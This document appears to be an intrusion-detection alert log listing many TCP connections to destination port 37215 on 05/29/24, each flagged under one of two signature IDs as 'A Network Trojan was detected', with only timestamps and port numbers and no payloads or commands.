                Timestamp:05/29/24-15:15:30.903739
                SID:2835222
                Source Port:58562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.414874
                SID:2829579
                Source Port:52776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071235
                SID:2829579
                Source Port:33142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.380382
                SID:2829579
                Source Port:57666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.074848
                SID:2835222
                Source Port:42404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.799610
                SID:2829579
                Source Port:46762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.713203
                SID:2829579
                Source Port:41252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.966994
                SID:2835222
                Source Port:39480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899570
                SID:2829579
                Source Port:51168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.743388
                SID:2835222
                Source Port:50696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.572139
                SID:2829579
                Source Port:59846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023142
                SID:2829579
                Source Port:60276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.243131
                SID:2835222
                Source Port:50096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584471
                SID:2829579
                Source Port:48716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226144
                SID:2829579
                Source Port:33414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.256975
                SID:2829579
                Source Port:43168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.651913
                SID:2829579
                Source Port:57682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.184479
                SID:2835222
                Source Port:55086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.175145
                SID:2829579
                Source Port:60464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.567277
                SID:2829579
                Source Port:51340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.380935
                SID:2829579
                Source Port:50076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.852228
                SID:2835222
                Source Port:40528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.667743
                SID:2829579
                Source Port:51688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.947669
                SID:2829579
                Source Port:57230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766813
                SID:2835222
                Source Port:43166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.472368
                SID:2835222
                Source Port:33488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.740657
                SID:2829579
                Source Port:43070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.801185
                SID:2835222
                Source Port:33618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025077
                SID:2835222
                Source Port:47354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.738359
                SID:2835222
                Source Port:53554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.170375
                SID:2835222
                Source Port:51584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.462529
                SID:2835222
                Source Port:35130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228630
                SID:2829579
                Source Port:49202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.862131
                SID:2829579
                Source Port:42978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.898397
                SID:2835222
                Source Port:44710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870182
                SID:2829579
                Source Port:42762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.528036
                SID:2835222
                Source Port:47264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.045523
                SID:2829579
                Source Port:58230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.862768
                SID:2835222
                Source Port:45350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897094
                SID:2829579
                Source Port:34106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.735385
                SID:2835222
                Source Port:41108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945278
                SID:2835222
                Source Port:56242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.702106
                SID:2829579
                Source Port:36714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.231665
                SID:2829579
                Source Port:49550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.105045
                SID:2835222
                Source Port:45338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023246
                SID:2835222
                Source Port:37588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784894
                SID:2829579
                Source Port:53184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.966439
                SID:2835222
                Source Port:44166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.948561
                SID:2835222
                Source Port:33768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071309
                SID:2829579
                Source Port:52302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.910035
                SID:2835222
                Source Port:33820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519241
                SID:2829579
                Source Port:58888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.365924
                SID:2829579
                Source Port:35080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668140
                SID:2829579
                Source Port:52722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.622300
                SID:2835222
                Source Port:36644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.427478
                SID:2829579
                Source Port:58796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421770
                SID:2835222
                Source Port:36478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.584015
                SID:2835222
                Source Port:36058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.715159
                SID:2835222
                Source Port:56072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.788214
                SID:2835222
                Source Port:43058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.225261
                SID:2829579
                Source Port:50472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668825
                SID:2835222
                Source Port:39388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.129157
                SID:2829579
                Source Port:51540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.813571
                SID:2835222
                Source Port:34488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071562
                SID:2835222
                Source Port:50804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945746
                SID:2829579
                Source Port:48918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521189
                SID:2835222
                Source Port:46018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.818013
                SID:2829579
                Source Port:45140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420013
                SID:2835222
                Source Port:59412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.960380
                SID:2829579
                Source Port:47172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113479
                SID:2835222
                Source Port:48450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.329458
                SID:2829579
                Source Port:33608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712088
                SID:2835222
                Source Port:57946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.688038
                SID:2829579
                Source Port:34462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982070
                SID:2835222
                Source Port:40024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.368997
                SID:2835222
                Source Port:58442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.958599
                SID:2835222
                Source Port:53282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.847274
                SID:2829579
                Source Port:50090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.380358
                SID:2835222
                Source Port:38576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385182
                SID:2835222
                Source Port:34496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.139764
                SID:2835222
                Source Port:42976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.474679
                SID:2829579
                Source Port:43616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.821248
                SID:2829579
                Source Port:59376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.987033
                SID:2829579
                Source Port:54638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.824660
                SID:2829579
                Source Port:41512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.885829
                SID:2835222
                Source Port:37864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.268480
                SID:2829579
                Source Port:59854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421147
                SID:2835222
                Source Port:43728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155568
                SID:2835222
                Source Port:50520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.810154
                SID:2835222
                Source Port:46318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519687
                SID:2835222
                Source Port:60904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.881849
                SID:2835222
                Source Port:46920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.847045
                SID:2835222
                Source Port:53382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902904
                SID:2829579
                Source Port:60994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.916906
                SID:2835222
                Source Port:59412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.721998
                SID:2835222
                Source Port:43746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.111080
                SID:2835222
                Source Port:53784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.180051
                SID:2835222
                Source Port:43944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363317
                SID:2829579
                Source Port:47550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.713986
                SID:2835222
                Source Port:42760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.832878
                SID:2835222
                Source Port:34416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.686368
                SID:2835222
                Source Port:33888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.835987
                SID:2829579
                Source Port:39032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.805983
                SID:2829579
                Source Port:42502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899736
                SID:2835222
                Source Port:55620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.531692
                SID:2829579
                Source Port:34244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914637
                SID:2835222
                Source Port:36608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.836473
                SID:2835222
                Source Port:59232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764261
                SID:2835222
                Source Port:50080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.864830
                SID:2835222
                Source Port:38962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210030
                SID:2829579
                Source Port:55472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.687898
                SID:2835222
                Source Port:52520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.429142
                SID:2829579
                Source Port:45078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.788519
                SID:2835222
                Source Port:57016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767518
                SID:2835222
                Source Port:39498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586621
                SID:2829579
                Source Port:37570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.091264
                SID:2829579
                Source Port:50164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.111208
                SID:2835222
                Source Port:37324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.651669
                SID:2835222
                Source Port:37890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.981376
                SID:2829579
                Source Port:36834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.735810
                SID:2829579
                Source Port:60212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.808525
                SID:2835222
                Source Port:48356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982901
                SID:2835222
                Source Port:50944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663190
                SID:2829579
                Source Port:58980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.812998
                SID:2835222
                Source Port:35144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.949646
                SID:2835222
                Source Port:51714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787385
                SID:2835222
                Source Port:44198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983725
                SID:2829579
                Source Port:55974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.703879
                SID:2829579
                Source Port:58814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.908192
                SID:2835222
                Source Port:56896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.662418
                SID:2835222
                Source Port:34806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628105
                SID:2829579
                Source Port:51564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422304
                SID:2829579
                Source Port:53388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896802
                SID:2835222
                Source Port:46606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154365
                SID:2835222
                Source Port:52060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.639597
                SID:2829579
                Source Port:48214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.977815
                SID:2835222
                Source Port:34042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166422
                SID:2829579
                Source Port:41118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362912
                SID:2829579
                Source Port:50864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262595
                SID:2829579
                Source Port:33908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.558208
                SID:2835222
                Source Port:51502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612552
                SID:2835222
                Source Port:34382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.706118
                SID:2835222
                Source Port:37024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.336625
                SID:2835222
                Source Port:48090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.626453
                SID:2829579
                Source Port:36810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.075396
                SID:2835222
                Source Port:53994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.339113
                SID:2829579
                Source Port:49550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521764
                SID:2829579
                Source Port:53292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.900151
                SID:2835222
                Source Port:48728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899117
                SID:2829579
                Source Port:39158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779600
                SID:2835222
                Source Port:44080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900448
                SID:2835222
                Source Port:34584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422270
                SID:2829579
                Source Port:33194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883737
                SID:2829579
                Source Port:41876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.962057
                SID:2829579
                Source Port:52620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464822
                SID:2829579
                Source Port:57084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.906692
                SID:2835222
                Source Port:45302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815684
                SID:2835222
                Source Port:60392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.867498
                SID:2829579
                Source Port:38362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.257284
                SID:2829579
                Source Port:58192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873243
                SID:2835222
                Source Port:39446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.531528
                SID:2829579
                Source Port:35160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.810389
                SID:2829579
                Source Port:54660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.621014
                SID:2835222
                Source Port:57026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767725
                SID:2835222
                Source Port:56386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.640782
                SID:2835222
                Source Port:50002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.997287
                SID:2829579
                Source Port:32846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.041200
                SID:2835222
                Source Port:54022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.615356
                SID:2835222
                Source Port:45942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.506327
                SID:2835222
                Source Port:43698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.326098
                SID:2829579
                Source Port:43852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597388
                SID:2829579
                Source Port:43328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943597
                SID:2829579
                Source Port:38650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227995
                SID:2829579
                Source Port:48664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597573
                SID:2835222
                Source Port:42832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965826
                SID:2835222
                Source Port:34312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.725910
                SID:2829579
                Source Port:53290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685705
                SID:2829579
                Source Port:58318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042834
                SID:2835222
                Source Port:38936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.783090
                SID:2835222
                Source Port:46426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023423
                SID:2829579
                Source Port:49172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.855655
                SID:2829579
                Source Port:52212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.184356
                SID:2835222
                Source Port:57386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417014
                SID:2829579
                Source Port:37744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.820500
                SID:2835222
                Source Port:41142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.686834
                SID:2829579
                Source Port:38276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567733
                SID:2829579
                Source Port:56116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.474766
                SID:2835222
                Source Port:60102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364407
                SID:2835222
                Source Port:55188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567356
                SID:2835222
                Source Port:42628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897041
                SID:2829579
                Source Port:47240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.877788
                SID:2835222
                Source Port:42860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.499531
                SID:2829579
                Source Port:39552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.803239
                SID:2829579
                Source Port:42974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586203
                SID:2829579
                Source Port:56920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968606
                SID:2829579
                Source Port:54926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.274295
                SID:2835222
                Source Port:53940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.375180
